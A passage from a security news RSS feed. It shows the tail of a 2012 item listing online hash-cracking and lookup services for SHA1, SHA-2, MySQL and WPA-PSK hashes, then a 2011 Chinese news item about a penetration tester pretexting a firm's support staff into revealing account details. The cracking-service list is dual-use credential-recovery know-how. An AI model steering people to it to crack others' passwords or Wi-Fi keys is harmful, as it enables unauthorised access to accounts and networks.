  &lt;a href="http://www.stringfunction.com/sha1-decrypter.html" rel="nofollow" target="_blank"&gt;http://www.stringfunction.com/sha1-decrypter.html&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.hash-cracker.com/index.php" rel="nofollow" target="_blank"&gt;hash-cracker.com&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;SHA 256-512&lt;/strong&gt;  &lt;br /&gt;
  &lt;a href="http://md5.shalla.de/cgi-bin/search.cgi" rel="nofollow" target="_blank"&gt;Shalla&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.hash-database.net/" rel="nofollow" target="_blank"&gt;Hash-Database&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://askcheck.com/" rel="nofollow" target="_blank"&gt;AskCheck&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;MySQL&lt;/strong&gt;  &lt;br /&gt;
  &lt;a href="http://hashcrack.com/index.php" rel="nofollow" target="_blank"&gt;HashCrack&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.cmd5.org/" rel="nofollow" target="_blank"&gt;CMD5&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="https://hashcracking.ru/index.php" rel="nofollow" target="_blank"&gt;HashCracking.ru&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;WPA-PSK (free)&lt;/strong&gt;  &lt;br /&gt;
  &lt;a href="http://www.md5decrypter.co.uk/forum/forum_topics.asp?FID=9" rel="nofollow" target="_blank"&gt;MD5Decrypter(uk)&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.wpa2crack.com/wpa-wpa2-psk-crack.php" rel="nofollow" target="_blank"&gt;WPA2Crack.com&lt;/a&gt;  &lt;br /&gt;
  &lt;strong&gt;(costs $$$)&lt;/strong&gt;  &lt;br /&gt;
  &lt;a href="http://www.wpacracker.com/" rel="nofollow" target="_blank"&gt;WPACracker&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://tools.question-defense.com/wpa-password-cracker/" rel="nofollow" target="_blank"&gt;Question-Defense&lt;/a&gt;&lt;/p&gt;
&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Security Tools 资源分享 hash LM</category>
      <guid isPermaLink="true">https://itindex.net/detail/39497-hash-md5-ntlm</guid>
      <pubDate>Sun, 02 Sep 2012 10:00:09 CST</pubDate>
    </item>
    <item>
      <title>黑客利用社交工程技术发动攻击</title>
      <link>https://itindex.net/detail/33578-%E9%BB%91%E5%AE%A2-%E5%88%A9%E7%94%A8-%E7%A4%BE%E4%BA%A4</link>
      <description>Burberry Scarf 写道 "《华尔街日报》报导，当防火墙日益严密，网络罪犯或黑客开始借助低技术方法渗透进安全系统。 克里斯·派滕(Chris Patten)向一家大型投资管理公司报告称，他即将离婚，担心妻子用假名开设了账户。这种情况完全可能，但在这个案例中，派滕却撒了谎。不疑有诈的公司客服代表将用户账号和其他详细信息交给了派滕，令人感到后怕。派滕其实是一位网络渗透测试安全专家。随着银行和其他大型企业开始投入大量资金建设防火墙，并使用复杂的技术来加强系统安全，黑客们逐渐将目光转向了这些企业的员工。派滕所使用的方法在安全领域被称作“假托技术”(pretexting)或“社交工程”，这已经成为企业目前面临的最大威胁之一。"&lt;img width="1" height="1" src="http://solidot.org.feedsportal.com/c/33236/f/556826/s/19b12d69/mf.gif" border="0"&gt;&lt;div&gt;&lt;table border="0"&gt;&lt;tr&gt;&lt;td valign="middle"&gt;&lt;a href="http://res.feedsportal.com/viral/sendemail2.html?title=%E9%BB%91%E5%AE%A2%E5%88%A9%E7%94%A8%E7%A4%BE%E4%BA%A4%E5%B7%A5%E7%A8%8B%E6%8A%80%E6%9C%AF%E5%8F%91%E5%8A%A8%E6%94%BB%E5%87%BB&amp;amp;link=http%3A%2F%2Finternet.solidot.org%2Farticle.pl%3Fsid%3D11%2F10%2F31%2F0650237%26amp%3Bfrom%3Drss"&gt;&lt;img src="http://res3.feedsportal.com/images/emailthis2.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;td valign="middle"&gt;&lt;a href="http://res.feedsportal.com/viral/bookmark.cfm?title=%E9%BB%91%E5%AE%A2%E5%88%A9%E7%94%A8%E7%A4%BE%E4%BA%A4%E5%B7%A5%E7%A8%8B%E6%8A%80%E6%9C%AF%E5%8F%91%E5%8A%A8%E6%94%BB%E5%87%BB&amp;amp;link=http%3A%2F%2Finternet.solidot.org%2Farticle.pl%3Fsid%3D11%2F10%2F31%2F0650237%26amp%3Bfrom%3Drss"&gt;&lt;img src="http://res3.feedsportal.com/images/bookmark.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;a href="http://da.feedsportal.com/r/117330697977/u/49/f/556826/c/33236/s/19b12d69/a2.htm"&gt;&lt;img src="http://da.feedsportal.com/r/117330697977/u/49/f/556826/c/33236/s/19b12d69/a2.img" border="0"&gt;&lt;/a&gt;&lt;div&gt;
&lt;a href="http://feeds.feedburner.com/~ff/solidot?a=SRUXKJldeRM:WzufSL3Z8A0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/solidot?d=yIl2AUoC8zA" border="0"&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/solidot?a=SRUXKJldeRM:WzufSL3Z8A0:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/solidot?d=7Q72WNTAKBA" border="0"&gt;&lt;/a&gt;
&lt;/div&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>security</category>
      <guid isPermaLink="true">https://itindex.net/detail/33578-%E9%BB%91%E5%AE%A2-%E5%88%A9%E7%94%A8-%E7%A4%BE%E4%BA%A4</guid>
      <pubDate>Mon, 31 Oct 2011 14:42:00 CST</pubDate>
    </item>
  </channel>
</rss>

